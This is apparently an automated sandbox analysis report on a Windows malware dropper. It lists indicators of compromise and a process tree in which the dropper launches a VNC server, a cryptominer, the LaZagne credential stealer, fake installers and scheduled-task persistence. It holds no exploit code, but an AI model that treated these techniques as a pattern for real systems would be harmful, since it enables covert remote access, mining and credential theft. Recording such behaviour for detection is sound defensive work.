description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ghjaedjgaw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ghjaedjgaw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Conditioning.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conditioning.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Systemhau.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ghjaedjgaw.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ghjaedjgaw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Systemhau.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 1664 timeout.exe 3892 timeout.exe 5096 timeout.exe 4756 timeout.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1028 WMIC.exe 364 WMIC.exe 8 WMIC.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 5104 systeminfo.exe 5648 systeminfo.exe -
Kills process with taskkill 2 IoCs
pid Process 2500 taskkill.exe 2116 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Fulloptionv2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5884 PING.EXE 4516 PING.EXE 3344 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5280 schtasks.exe 5592 schtasks.exe 4184 schtasks.exe 2384 schtasks.exe 4496 schtasks.exe 6028 schtasks.exe 1688 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1108 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 1760 winvnc.exe 2016 chrome.exe 2016 chrome.exe 3896 powershell.exe 3896 powershell.exe 3896 powershell.exe 804 .exe 804 .exe 804 .exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 4504 ghjaedjgaw.exe 4504 ghjaedjgaw.exe 804 .exe 804 .exe 804 .exe 3432 ghjaedjgaw.exe 3432 ghjaedjgaw.exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe 804 .exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3200 diskutil.exe 804 .exe 4544 33.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 5932 windows.exe 5932 windows.exe 5932 windows.exe 5932 windows.exe 5932 windows.exe 5932 windows.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3720 New Text Document mod.exe Token: SeShutdownPrivilege 2016 chrome.exe Token: SeCreatePagefilePrivilege 2016 chrome.exe Token: SeShutdownPrivilege 2016 chrome.exe Token: SeCreatePagefilePrivilege 2016 chrome.exe Token: SeShutdownPrivilege 2016 chrome.exe Token: SeCreatePagefilePrivilege 2016 chrome.exe Token: SeShutdownPrivilege 2016 chrome.exe Token: SeCreatePagefilePrivilege 2016 chrome.exe Token: SeShutdownPrivilege 2016 chrome.exe Token: SeCreatePagefilePrivilege 2016 chrome.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 804 .exe Token: SeDebugPrivilege 1784 diskutil.exe Token: SeDebugPrivilege 3200 diskutil.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 884 systempreter.exe Token: SeLockMemoryPrivilege 444 xmrig.exe Token: SeLockMemoryPrivilege 444 xmrig.exe Token: SeDebugPrivilege 2276 tasklist.exe Token: SeDebugPrivilege 5020 tasklist.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 4156 tasklist.exe Token: SeIncreaseQuotaPrivilege 644 WMIC.exe Token: SeSecurityPrivilege 644 WMIC.exe Token: SeTakeOwnershipPrivilege 644 WMIC.exe Token: SeLoadDriverPrivilege 644 WMIC.exe Token: SeSystemProfilePrivilege 644 WMIC.exe Token: SeSystemtimePrivilege 644 WMIC.exe Token: SeProfSingleProcessPrivilege 644 WMIC.exe Token: SeIncBasePriorityPrivilege 644 WMIC.exe Token: SeCreatePagefilePrivilege 644 WMIC.exe Token: SeBackupPrivilege 644 WMIC.exe Token: SeRestorePrivilege 644 WMIC.exe Token: SeShutdownPrivilege 644 WMIC.exe Token: SeDebugPrivilege 644 WMIC.exe Token: SeSystemEnvironmentPrivilege 644 WMIC.exe Token: SeRemoteShutdownPrivilege 644 WMIC.exe Token: SeUndockPrivilege 644 WMIC.exe Token: SeManageVolumePrivilege 644 WMIC.exe Token: 33 644 WMIC.exe Token: 34 644 WMIC.exe Token: 35 644 WMIC.exe Token: 36 644 WMIC.exe Token: SeIncreaseQuotaPrivilege 644 WMIC.exe Token: SeSecurityPrivilege 644 WMIC.exe Token: SeTakeOwnershipPrivilege 644 WMIC.exe Token: SeLoadDriverPrivilege 644 WMIC.exe Token: SeSystemProfilePrivilege 644 WMIC.exe Token: SeSystemtimePrivilege 644 WMIC.exe Token: SeProfSingleProcessPrivilege 644 WMIC.exe Token: SeIncBasePriorityPrivilege 644 WMIC.exe Token: SeCreatePagefilePrivilege 644 WMIC.exe Token: SeBackupPrivilege 644 WMIC.exe Token: SeRestorePrivilege 644 WMIC.exe Token: SeShutdownPrivilege 644 WMIC.exe Token: SeDebugPrivilege 644 WMIC.exe Token: SeSystemEnvironmentPrivilege 644 WMIC.exe Token: SeRemoteShutdownPrivilege 644 WMIC.exe Token: SeUndockPrivilege 644 WMIC.exe Token: SeManageVolumePrivilege 644 WMIC.exe Token: 33 644 WMIC.exe Token: 34 644 WMIC.exe Token: 35 644 WMIC.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
pid Process 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 444 xmrig.exe 3860 Conditioning.com 3860 Conditioning.com 3860 Conditioning.com -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 3860 Conditioning.com 3860 Conditioning.com 3860 Conditioning.com -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 804 .exe 3200 diskutil.exe 5076 boost.exe 5076 boost.exe 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 4544 33.exe 4544 33.exe 4544 33.exe 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 1108 EXCEL.EXE 4508 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3720 wrote to memory of 4032 3720 New Text Document mod.exe 84 PID 3720 wrote to memory of 4032 3720 New Text Document mod.exe 84 PID 3720 wrote to memory of 4032 3720 New Text Document mod.exe 84 PID 3720 wrote to memory of 2616 3720 New Text Document mod.exe 106 PID 3720 wrote to memory of 2616 3720 New Text Document mod.exe 106 PID 3720 wrote to memory of 2616 3720 New Text Document mod.exe 106 PID 3720 wrote to memory of 1244 3720 New Text Document mod.exe 110 PID 3720 wrote to memory of 1244 3720 New Text Document mod.exe 110 PID 1244 wrote to memory of 3176 1244 Coc%20Coc.exe 111 PID 1244 wrote to memory of 3176 1244 Coc%20Coc.exe 111 PID 3176 wrote to memory of 2268 3176 cmd.exe 113 PID 3176 wrote to memory of 2268 3176 cmd.exe 113 PID 3176 wrote to memory of 2268 3176 cmd.exe 113 PID 2268 wrote to memory of 3932 2268 portable_util.exe 114 PID 2268 wrote to memory of 3932 2268 portable_util.exe 114 PID 2268 wrote to memory of 3932 2268 portable_util.exe 114 PID 3932 wrote to memory of 4012 3932 setup.exe 115 PID 3932 wrote to memory of 4012 3932 setup.exe 115 PID 3932 wrote to memory of 4012 3932 setup.exe 115 PID 3720 wrote to memory of 1760 3720 New Text Document mod.exe 116 PID 3720 wrote to memory of 1760 3720 New Text Document mod.exe 116 PID 3720 wrote to memory of 1760 3720 New Text Document mod.exe 116 PID 3720 wrote to memory of 3788 3720 New Text Document mod.exe 118 PID 3720 wrote to memory of 3788 3720 New Text Document mod.exe 118 PID 3720 wrote to memory of 3788 3720 New Text Document mod.exe 118 PID 3788 wrote to memory of 2248 3788 vc_redist.x64.exe 119 PID 3788 wrote to memory of 2248 3788 vc_redist.x64.exe 119 PID 3788 wrote to memory of 2248 3788 vc_redist.x64.exe 119 PID 3720 wrote to memory of 3628 3720 New Text Document mod.exe 120 PID 3720 wrote to memory of 3628 3720 New Text Document mod.exe 120 PID 3628 wrote to memory of 1460 3628 Google%20Chrome.exe 121 PID 3628 wrote to memory of 1460 3628 Google%20Chrome.exe 121 PID 1460 wrote to memory of 2016 1460 cmd.exe 123 PID 1460 wrote to memory of 2016 1460 cmd.exe 123 PID 2016 wrote to memory of 1268 2016 chrome.exe 126 PID 2016 wrote to memory of 1268 2016 chrome.exe 126 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 PID 2016 wrote to memory of 2920 2016 chrome.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 5036 attrib.exe 1016 attrib.exe 3192 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook LaZagne.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook LaZagne.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\a\win.exe"C:\Users\Admin\AppData\Local\Temp\a\win.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\a\Office%202010%20Toolkit.exe"C:\Users\Admin\AppData\Local\Temp\a\Office%202010%20Toolkit.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe"C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\500A.tmp\500B.tmp\500C.bat C:\Users\Admin\AppData\Local\Temp\a\Coc%20Coc.exe"3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Roaming\portable_util.exeportable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Roaming\setup.exe"C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Roaming\setup.exeC:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x318,0x31c,0x320,0x2f4,0x324,0xf28088,0xf28098,0xf280a46⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\winvnc.exe"C:\Users\Admin\AppData\Local\Temp\a\winvnc.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\a\vc_redist.x64.exe" -burn.unelevated BurnPipe.{6C26125F-6DA7-49EA-811B-3A4786E6A902} {EB6EFEE2-F24D-4C32-B9B4-2BE8B356FDDC} 37883⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2248
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe"C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7332.tmp\7333.tmp\7344.bat C:\Users\Admin\AppData\Local\Temp\a\Google%20Chrome.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" hoiquannet.com/3014⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf4,0x128,0x7ffa5a3ccc40,0x7ffa5a3ccc4c,0x7ffa5a3ccc585⤵PID:1268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:25⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1996,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:35⤵PID:1696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:85⤵PID:2296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:15⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:15⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3796,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3696 /prefetch:15⤵PID:3536
-
-
